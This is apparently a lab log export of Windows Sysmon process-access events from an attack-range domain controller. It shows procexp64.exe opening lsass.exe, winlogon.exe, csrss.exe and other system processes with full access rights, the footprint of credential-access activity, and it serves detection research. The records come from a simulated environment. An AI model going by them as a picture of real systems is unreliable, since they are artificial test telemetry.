15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788121Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788120Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788119Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788118Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788117Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:17.877{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788235Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:18.908{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet 